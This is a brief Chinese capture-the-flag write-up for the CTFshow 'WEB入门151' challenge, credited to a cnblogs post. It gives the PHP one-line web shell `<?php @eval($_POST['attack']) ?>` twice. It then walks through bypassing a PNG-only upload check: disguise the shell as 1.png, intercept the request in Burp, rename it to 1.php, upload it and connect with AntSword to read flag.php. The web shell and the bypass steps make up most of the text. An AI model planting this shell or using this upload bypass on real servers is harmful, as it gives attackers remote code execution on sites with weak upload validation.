只能上传png图片,我们写一个一句话木马<?php @eval($_POST[‘attack‘]) ?> 重命名为1.png,bp抓包,然后上传, ctrl+R放到repeater中,将1.png改为1.php GO一下,发现上传成功,返回了上传路径/upload/1.php 用蚁剑连接,在/var/www/html路径发现flag.php
<?php @eval($_POST[‘attack‘]) ?>
CTFshow WEB入门151
原文:https://www.cnblogs.com/z1ten9/p/14369855.html
